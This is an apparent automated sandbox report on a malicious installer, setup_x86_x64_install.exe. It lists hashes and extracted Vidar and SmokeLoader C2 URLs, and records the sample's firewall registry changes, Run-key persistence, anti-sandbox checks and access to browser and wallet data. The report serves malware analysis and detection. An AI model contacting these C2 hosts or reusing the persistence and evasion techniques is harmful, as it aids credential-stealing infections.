Overview
overview
10Static
static
setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows11_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10Resubmissions
08-10-2021 15:07
211008-shl8xsefa9 1008-10-2021 05:38
211008-gbvqyadce8 1007-10-2021 18:28
211007-w4jayacge3 10Analysis
-
max time kernel
1804s -
max time network
1801s -
platform
windows7_x64 -
resource
win7-ja-20210920 -
submitted
08-10-2021 15:07
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-ja-20210920
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win7v20210408
Behavioral task
behavioral3
Sample
setup_x86_x64_install.exe
Resource
win7-de-20210920
Behavioral task
behavioral4
Sample
setup_x86_x64_install.exe
Resource
win11
Behavioral task
behavioral5
Sample
setup_x86_x64_install.exe
Resource
win10v20210408
Behavioral task
behavioral6
Sample
setup_x86_x64_install.exe
Resource
win10-ja-20210920
Behavioral task
behavioral7
Sample
setup_x86_x64_install.exe
Resource
win10-en-20210920
Behavioral task
behavioral8
Sample
setup_x86_x64_install.exe
Resource
win10-de-20210920
General
-
Target
setup_x86_x64_install.exe
-
Size
5.9MB
-
MD5
0308d3044eda0db671c58c2a97cb3c10
-
SHA1
1737ab616a61d35b0bde0aaad949d9894e14be9e
-
SHA256
b52242da50ea2b3a05f6787dfa7197a0c99442e91d3bc78b71363c2ff3c4f072
-
SHA512
29902fe4a53319290d18b65a6baa1d747f1389a84cd7eb1a123d05b418b737336cd54c84b76403bc2cbb1f078c19b4461a89eec8214bfcdcf4831bb1dbda0e3e
Malware Config
Extracted
vidar
41.2
916
https://mas.to/@serg4325
-
profile_id
916
Extracted
smokeloader
2020
http://gmpeople.com/upload/
http://mile48.com/upload/
http://lecanardstsornin.com/upload/
http://m3600.com/upload/
http://camasirx.com/upload/
Signatures
-
Modifies firewall policy service 2 TTPs 5 IoCs
Processes:
msiexec.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Static\System msiexec.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Static\System\clr_optimization_v4.0.30319_32-1 = "V2.0|Action=Block|Dir=In|App=C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe|Svc=clr_optimization_v4.0.30319_32|Name=Block traffic for clr_optimization_v4.0.30319_32|" msiexec.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Static\System\clr_optimization_v4.0.30319_32-2 = "V2.0|Action=Block|Dir=Out|App=C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe|Svc=clr_optimization_v4.0.30319_32|Name=Block traffic for clr_optimization_v4.0.30319_32|" msiexec.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Static\System\clr_optimization_v4.0.30319_64-1 = "V2.0|Action=Block|Dir=In|App=C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe|Svc=clr_optimization_v4.0.30319_64|Name=Block traffic for clr_optimization_v4.0.30319_64|" msiexec.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Static\System\clr_optimization_v4.0.30319_64-2 = "V2.0|Action=Block|Dir=Out|App=C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe|Svc=clr_optimization_v4.0.30319_64|Name=Block traffic for clr_optimization_v4.0.30319_64|" msiexec.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/2340-290-0x000000000041B23A-mapping.dmp family_redline -
Registers COM server for autorun 1 TTPs
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zSC5312776\Thu165bd34b1e1d4d81.exe family_socelars \Users\Admin\AppData\Local\Temp\7zSC5312776\Thu165bd34b1e1d4d81.exe family_socelars -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 1 IoCs
Processes:
resource yara_rule behavioral1/memory/1400-196-0x0000000000400000-0x0000000002E08000-memory.dmp family_vidar -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zSC5312776\libcurlpp.dll aspack_v212_v242 \Users\Admin\AppData\Local\Temp\7zSC5312776\libcurl.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zSC5312776\libcurl.dll aspack_v212_v242 \Users\Admin\AppData\Local\Temp\7zSC5312776\libcurlpp.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zSC5312776\libstdc++-6.dll aspack_v212_v242 \Users\Admin\AppData\Local\Temp\7zSC5312776\libstdc++-6.dll aspack_v212_v242 -
Downloads MZ/PE file
-
Executes dropped EXE 64 IoCs
Processes:
setup_installer.exesetup_install.exeThu16466b26f8b7.exeThu1628aafb3efd7c3d.exeThu164ba03be19.exeThu167d514d2a7ac5a.exeThu161580bf75.exeThu166f9a8bbe80.exeThu16205451b994.exeThu165bd34b1e1d4d81.exeThu16f584bd3686.exeThu16f3de88a335950bb.exeThu1653d94a8da.exeThu16f3de88a335950bb.tmpThu16f3de88a335950bb.exeThu16f3de88a335950bb.tmp3720332.scr6537941.scrpostback.exeFarLabUninstaller.exeF6Ov3FAHfwyj7yenlzaqdNBa.exeNDP472-KB4054531-Web.exe09xU.exESetup.exeWinHoster.exe2102080.scrThu164ba03be19.exe7042787.scr8525018.scr3321.exeSetupUtility.exehhjjfdrServiceModelReg.exeServiceModelReg.execonhost.exeregtlibv12.execonhost.exeregtlibv12.exeregtlibv12.exeregtlibv12.exeregtlibv12.exeregtlibv12.exeregtlibv12.exeregtlibv12.exeregtlibv12.exeregtlibv12.exeregtlibv12.exeregtlibv12.exeaspnet_regiis.exeaspnet_regiis.exengen.exemscorsvw.exengen.exemscorsvw.exemscorsvw.exengen.exemscorsvw.exengen.exemscorsvw.exemscorsvw.exemscorsvw.exemscorsvw.exemscorsvw.exemscorsvw.exepid process 860 setup_installer.exe 1696 setup_install.exe 1628 Thu16466b26f8b7.exe 1400 Thu1628aafb3efd7c3d.exe 1668 Thu164ba03be19.exe 960 Thu167d514d2a7ac5a.exe 1644 Thu161580bf75.exe 1856 Thu166f9a8bbe80.exe 628 Thu16205451b994.exe 1820 Thu165bd34b1e1d4d81.exe 1208 Thu16f584bd3686.exe 1728 Thu16f3de88a335950bb.exe 472 Thu1653d94a8da.exe 1768 Thu16f3de88a335950bb.tmp 1604 Thu16f3de88a335950bb.exe 856 Thu16f3de88a335950bb.tmp 2252 3720332.scr 2312 6537941.scr 2328 postback.exe 2352 FarLabUninstaller.exe 2416 F6Ov3FAHfwyj7yenlzaqdNBa.exe 2436 NDP472-KB4054531-Web.exe 2580 09xU.exE 2616 Setup.exe 2740 WinHoster.exe 2840 2102080.scr 2340 Thu164ba03be19.exe 2624 7042787.scr 2948 8525018.scr 1136 3321.exe 812 SetupUtility.exe 2360 hhjjfdr 2924 ServiceModelReg.exe 2632 ServiceModelReg.exe 2104 conhost.exe 836 regtlibv12.exe 2160 conhost.exe 2332 regtlibv12.exe 2516 regtlibv12.exe 1948 regtlibv12.exe 1356 regtlibv12.exe 2636 regtlibv12.exe 2564 regtlibv12.exe 2316 regtlibv12.exe 276 regtlibv12.exe 2340 regtlibv12.exe 1544 regtlibv12.exe 2956 regtlibv12.exe 1220 aspnet_regiis.exe 2648 aspnet_regiis.exe 2908 ngen.exe 836 mscorsvw.exe 2688 ngen.exe 2576 mscorsvw.exe 2968 mscorsvw.exe 2476 ngen.exe 2136 mscorsvw.exe 1512 ngen.exe 760 mscorsvw.exe 2540 mscorsvw.exe 2088 mscorsvw.exe 2676 mscorsvw.exe 2936 mscorsvw.exe 2452 mscorsvw.exe -
Modifies Installed Components in the registry 2 TTPs
-
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
2102080.scr7042787.scrdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2102080.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2102080.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 7042787.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 7042787.scr -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Thu166f9a8bbe80.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Control Panel\International\Geo\Nation Thu166f9a8bbe80.exe -
Loads dropped DLL 64 IoCs
Processes:
setup_x86_x64_install.exesetup_installer.exesetup_install.execmd.execmd.execmd.execmd.execmd.exeThu16466b26f8b7.exeThu164ba03be19.exeThu1628aafb3efd7c3d.execmd.execmd.exeThu167d514d2a7ac5a.execmd.exeThu166f9a8bbe80.exeThu16205451b994.execmd.execmd.execmd.exeThu16f3de88a335950bb.exeThu1653d94a8da.exeThu165bd34b1e1d4d81.exeThu16f3de88a335950bb.tmpThu16f3de88a335950bb.exeThu16f3de88a335950bb.tmpWerFault.exepid process 1080 setup_x86_x64_install.exe 860 setup_installer.exe 860 setup_installer.exe 860 setup_installer.exe 860 setup_installer.exe 860 setup_installer.exe 860 setup_installer.exe 1696 setup_install.exe 1696 setup_install.exe 1696 setup_install.exe 1696 setup_install.exe 1696 setup_install.exe 1696 setup_install.exe 1696 setup_install.exe 1696 setup_install.exe 1176 cmd.exe 112 cmd.exe 112 cmd.exe 948 cmd.exe 948 cmd.exe 1176 cmd.exe 916 cmd.exe 1772 cmd.exe 1628 Thu16466b26f8b7.exe 1628 Thu16466b26f8b7.exe 1668 Thu164ba03be19.exe 1668 Thu164ba03be19.exe 1400 Thu1628aafb3efd7c3d.exe 1400 Thu1628aafb3efd7c3d.exe 1468 cmd.exe 1568 cmd.exe 1568 cmd.exe 960 Thu167d514d2a7ac5a.exe 960 Thu167d514d2a7ac5a.exe 1916 cmd.exe 1856 Thu166f9a8bbe80.exe 1856 Thu166f9a8bbe80.exe 628 Thu16205451b994.exe 628 Thu16205451b994.exe 664 cmd.exe 1320 cmd.exe 1780 cmd.exe 1728 Thu16f3de88a335950bb.exe 1728 Thu16f3de88a335950bb.exe 472 Thu1653d94a8da.exe 472 Thu1653d94a8da.exe 1728 Thu16f3de88a335950bb.exe 1820 Thu165bd34b1e1d4d81.exe 1820 Thu165bd34b1e1d4d81.exe 1768 Thu16f3de88a335950bb.tmp 1768 Thu16f3de88a335950bb.tmp 1768 Thu16f3de88a335950bb.tmp 1768 Thu16f3de88a335950bb.tmp 1604 Thu16f3de88a335950bb.exe 1604 Thu16f3de88a335950bb.exe 1604 Thu16f3de88a335950bb.exe 856 Thu16f3de88a335950bb.tmp 856 Thu16f3de88a335950bb.tmp 856 Thu16f3de88a335950bb.tmp 2232 WerFault.exe 2232 WerFault.exe 2232 WerFault.exe 856 Thu16f3de88a335950bb.tmp 856 Thu16f3de88a335950bb.tmp -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
6537941.scrdescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" 6537941.scr -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
2102080.scr7042787.scrdescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 2102080.scr Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 7042787.scr -
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
msiexec.exedescription ioc process File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\Z: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 42 ipinfo.io 14 ip-api.com 41 ipinfo.io -
Drops file in System32 directory 58 IoCs
Processes:
msiexec.exemscorsvw.exeaspnet_regiis.exeaspnet_regiis.exeSetup.exemofcomp.exemofcomp.exemofcomp.exemofcomp.exemofcomp.exemofcomp.exedescription ioc process File opened for modification C:\Windows\SysWOW64\msvcr120_clr0400.dll msiexec.exe File created C:\Windows\SysWOW64\msvcp120_clr0400.dll msiexec.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7B2238AACCEDC3F1FFE8E7EB5F575EC9 mscorsvw.exe File opened for modification C:\Windows\SysWOW64\en-US\dfshim.dll.mui msiexec.exe File created C:\Windows\SysWOW64\msvcp110_clr0400.dll msiexec.exe File created C:\Windows\system32\perfh007.dat aspnet_regiis.exe File created C:\Windows\system32\perfc00C.dat aspnet_regiis.exe File opened for modification C:\Windows\SysWOW64\msvcp110_clr0400.dll msiexec.exe File opened for modification C:\Windows\system32\msvcp120_clr0400.dll msiexec.exe File created C:\Windows\system32\perfc007.dat aspnet_regiis.exe File opened for modification C:\Windows\system32\aspnet_counters.dll msiexec.exe File opened for modification C:\Windows\system32\msvcr100_clr0400.dll msiexec.exe File created C:\Windows\SysWOW64\msvcr120_clr0400.dll msiexec.exe File created C:\Windows\system32\perfh011.dat aspnet_regiis.exe File created C:\Windows\system32\perfc011.dat aspnet_regiis.exe File created C:\Windows\SysWOW64\PerfStringBackup.TMP aspnet_regiis.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7B2238AACCEDC3F1FFE8E7EB5F575EC9 mscorsvw.exe File created C:\Windows\system32\perfh009.dat aspnet_regiis.exe File created C:\Windows\system32\perfh00C.dat aspnet_regiis.exe File opened for modification C:\Windows\SysWOW64\msvcr100_clr0400.dll msiexec.exe File opened for modification C:\Windows\SysWOW64\msvcp120_clr0400.dll msiexec.exe File opened for modification C:\Windows\system32\msvcr110_clr0400.dll msiexec.exe File opened for modification C:\Windows\system32\msvcr120_clr0400.dll msiexec.exe File opened for modification C:\Windows\SysWOW64\msvcp120_clr0400.dll Setup.exe File opened for modification C:\Windows\system32\wbem\AutoRecover\7073EBB8E2F3C70E0FA1F650B7DEA970.mof mofcomp.exe File created C:\Windows\system32\perfh007.dat aspnet_regiis.exe File created C:\Windows\system32\msvcr100_clr0400.dll msiexec.exe File created C:\Windows\system32\msvcr120_clr0400.dll msiexec.exe File created C:\Windows\system32\perfh009.dat aspnet_regiis.exe File opened for modification C:\Windows\SysWOW64\PerfStringBackup.INI aspnet_regiis.exe File created C:\Windows\system32\aspnet_counters.dll msiexec.exe File created C:\Windows\system32\en-US\dfshim.dll.mui msiexec.exe File created C:\Windows\system32\msvcp110_clr0400.dll msiexec.exe File created C:\Windows\system32\msvcr110_clr0400.dll msiexec.exe File opened for modification C:\Windows\SysWOW64\msvcr120_clr0400.dll Setup.exe File opened for modification C:\Windows\system32\PerfStringBackup.INI aspnet_regiis.exe File opened for modification C:\Windows\SysWOW64\msvcr110_clr0400.dll msiexec.exe File created C:\Windows\SysWOW64\aspnet_counters.dll msiexec.exe File created C:\Windows\SysWOW64\msvcr110_clr0400.dll msiexec.exe File created C:\Windows\SysWOW64\msvcr100_clr0400.dll msiexec.exe File created C:\Windows\system32\perfc009.dat aspnet_regiis.exe File created C:\Windows\system32\perfh00C.dat aspnet_regiis.exe File opened for modification C:\Windows\SysWOW64\aspnet_counters.dll msiexec.exe File created C:\Windows\system32\msvcp120_clr0400.dll msiexec.exe File created C:\Windows\system32\PerfStringBackup.TMP aspnet_regiis.exe File created C:\Windows\system32\perfh011.dat aspnet_regiis.exe File opened for modification C:\Windows\system32\wbem\AutoRecover\D361F8B496FD6DAF7BEEF497E09C0DC1.mof mofcomp.exe File opened for modification C:\Windows\system32\en-US\dfshim.dll.mui msiexec.exe File opened for modification C:\Windows\system32\wbem\AutoRecover\6F8564A71977AE6B940705DCC4847A8D.mof mofcomp.exe File created C:\Windows\system32\perfc007.dat aspnet_regiis.exe File created C:\Windows\SysWOW64\en-US\dfshim.dll.mui msiexec.exe File opened for modification C:\Windows\system32\wbem\AutoRecover\716FDC254E211F547A560E1A71D0E6CA.mof mofcomp.exe File opened for modification C:\Windows\system32\wbem\AutoRecover\E6195BA9E153534E5472835E2F29A5B0.mof mofcomp.exe File opened for modification C:\Windows\system32\msvcp110_clr0400.dll msiexec.exe File created C:\Windows\system32\perfc00C.dat aspnet_regiis.exe File created C:\Windows\system32\perfc011.dat aspnet_regiis.exe File opened for modification C:\Windows\system32\wbem\AutoRecover\7073EBB8E2F3C70E0FA1F650B7DEA970.mof mofcomp.exe File created C:\Windows\system32\perfc009.dat aspnet_regiis.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
2102080.scr7042787.scrpid process 2840 2102080.scr 2624 7042787.scr -
Suspicious use of SetThreadContext 1 IoCs
Processes:
Thu164ba03be19.exedescription pid process target process PID 1668 set thread context of 2340 1668 Thu164ba03be19.exe Thu164ba03be19.exe -
Drops file in Program Files directory 12 IoCs
Processes:
Thu16f3de88a335950bb.tmpmsiexec.exedescription ioc process File opened for modification C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe Thu16f3de88a335950bb.tmp File created C:\Program Files (x86)\FarLabUninstaller\is-NR3TB.tmp Thu16f3de88a335950bb.tmp File created C:\Program Files (x86)\FarLabUninstaller\is-E5LA3.tmp Thu16f3de88a335950bb.tmp File opened for modification C:\Program Files (x86)\FarLabUninstaller\unins000.dat Thu16f3de88a335950bb.tmp File opened for modification C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_client.xml msiexec.exe File opened for modification C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_extended.xml msiexec.exe File created C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_client.xml msiexec.exe File opened for modification C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe Thu16f3de88a335950bb.tmp File created C:\Program Files (x86)\FarLabUninstaller\unins000.dat Thu16f3de88a335950bb.tmp File created C:\Program Files (x86)\FarLabUninstaller\is-UBOF9.tmp Thu16f3de88a335950bb.tmp File created C:\Program Files (x86)\FarLabUninstaller\is-2Q7FU.tmp Thu16f3de88a335950bb.tmp File created C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_extended.xml msiexec.exe -
Drops file in Windows directory 64 IoCs
Processes:
msiexec.exelodctr.exeSetup.exelodctr.exelodctr.exemscorsvw.exengen.exemscorsvw.exelodctr.exeaspnet_regiis.exemscorsvw.exedescription ioc process File opened for modification C:\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\wpf-etw.man msiexec.exe File created C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.VisualBasic.Activities.Compiler\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.Activities.Compiler.dll msiexec.exe File created C:\Windows\inf\.NET CLR Networking 4.0.0.0\001F\_Networkingperfcounters.ini lodctr.exe File opened for modification C:\Windows\Installer\MSIE8FD.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIF09C.tmp msiexec.exe File created C:\Windows\Microsoft.NET\Framework\v4.0.30319\ASP.NETWebAdminFiles\App_LocalResources\home1.aspx.resx msiexec.exe File created C:\Windows\Microsoft.NET\Framework64\v4.0.30319\WPF\PresentationNative_v0400.dll msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Xml.XmlSerializer.dll msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework\v4.0.30319\_TransactionBridgePerfCounters.ini msiexec.exe File opened for modification C:\Windows\Installer\MSIEFEA.tmp msiexec.exe File opened for modification C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Build\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.dll msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll Setup.exe File created C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\DefaultWsdlHelpGenerator.aspx msiexec.exe File created C:\Windows\Microsoft.NET\Framework\v4.0.30319\FileTracker.dll msiexec.exe File created C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Transactions.Bridge.Dtc.dll msiexec.exe File created C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Input.Manipulations\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Input.Manipulations.dll msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SetupCache\v4.7.03062\2052\eula.rtf msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\corperfmonsymbols.ini msiexec.exe File opened for modification C:\Windows\Installer\MSI3D21.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIF00B.tmp msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SetupCache\v4.7.03062\1030\eula.rtf msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\AppConfig\App_LocalResources\DebugAndTrace.aspx.resx msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\Images\gradient_onBlue.gif msiexec.exe File created C:\Windows\Microsoft.NET\Framework64\v4.0.30319\XPThemes.manifest msiexec.exe File created C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clretwrc.dll msiexec.exe File created C:\Windows\Microsoft.NET\NETFXRepair.exe msiexec.exe File created C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Design.dll msiexec.exe File created C:\Windows\Microsoft.NET\assembly\GAC_MSIL\XsdBuildTask\v4.0_4.0.0.0__31bf3856ad364e35\XsdBuildTask.dll msiexec.exe File created C:\Windows\inf\MSDTC Bridge 4.0.0.0\0010\_TransactionBridgePerfCounters.ini lodctr.exe File created C:\Windows\inf\MSDTC Bridge 4.0.0.0\0804\_TransactionBridgePerfCounters.ini lodctr.exe File opened for modification C:\Windows\Microsoft.NET\Framework\v4.0.30319\netstandard.dll msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Aspnet.config msiexec.exe File created C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.XML.dll msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Net.WebSockets.dll msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework\v4.0.30319\TLBREF.DLL msiexec.exe File created C:\Windows\Microsoft.NET\assembly\GAC_32\PresentationCore\v4.0_4.0.0.0__31bf3856ad364e35\PresentationCore.dll msiexec.exe File opened for modification C:\Windows\assembly\NativeImages_v2.0.50727_64\index14f.dat mscorsvw.exe File created C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_isapi.dll msiexec.exe File created C:\Windows\Microsoft.NET\Framework\v4.0.30319\dfsvc.exe msiexec.exe File created C:\Windows\Microsoft.NET\Framework\v4.0.30319\normidna.nlp msiexec.exe File created C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Duplex\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceModel.Duplex.dll msiexec.exe File created C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Net.Http.WebRequest.dll msiexec.exe File opened for modification C:\Windows\inf\.NET CLR Networking 4.0.0.0\_NetworkingPerfCounters.h ngen.exe File opened for modification C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Reflection.Primitives.dll msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\Providers\ManageProviders.aspx msiexec.exe File opened for modification C:\Windows\Installer\MSIDCBD.tmp msiexec.exe File created C:\Windows\assembly\GACLock.dat mscorsvw.exe File opened for modification C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.tlb msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\WPF\PenIMC_v0400.dll msiexec.exe File created C:\Windows\inf\Windows Workflow Foundation 4.0.0.0\0013\PerfCounters.ini lodctr.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\Images\alert_lrg.gif msiexec.exe File created C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Linq.Expressions\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Linq.Expressions.dll msiexec.exe File created C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe msiexec.exe File created C:\Windows\inf\aspnet_state\0012\aspnet_state_perf.ini aspnet_regiis.exe File created C:\Windows\inf\MSDTC Bridge 4.0.0.0\0816\_TransactionBridgePerfCounters.ini lodctr.exe File opened for modification C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_state_perf.h msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\Images\unSelectedTab_rightCorner.gif msiexec.exe File created C:\Windows\inf\ASP.NET\0012\aspnet_perf2.ini aspnet_regiis.exe File opened for modification C:\Windows\assembly\NativeImages_v2.0.50727_64\index153.dat mscorsvw.exe File opened for modification C:\Windows\Microsoft.NET\Framework\v4.0.30319\netmemorycache.h msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\en-US\ServiceModelPerformanceCounters.dll.mui msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework\v4.0.30319\adonetdiag.mof.uninstall msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state_perf.ini msiexec.exe File created C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\Providers\App_LocalResources\chooseProviderManagement.aspx.resx msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 2 IoCs
Processes:
WerFault.exeWerFault.exepid pid_target process target process 2232 1400 WerFault.exe Thu1628aafb3efd7c3d.exe 3056 1856 WerFault.exe Thu166f9a8bbe80.exe -
Checks SCSI registry key(s) 3 TTPs 12 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
Thu16466b26f8b7.exehhjjfdrhhjjfdrhhjjfdrdescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Thu16466b26f8b7.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Thu16466b26f8b7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI hhjjfdr Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI hhjjfdr Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI hhjjfdr Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI hhjjfdr Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Thu16466b26f8b7.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI hhjjfdr Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI hhjjfdr Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI hhjjfdr Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI hhjjfdr Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI hhjjfdr -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
Setup.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Setup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz Setup.exe -
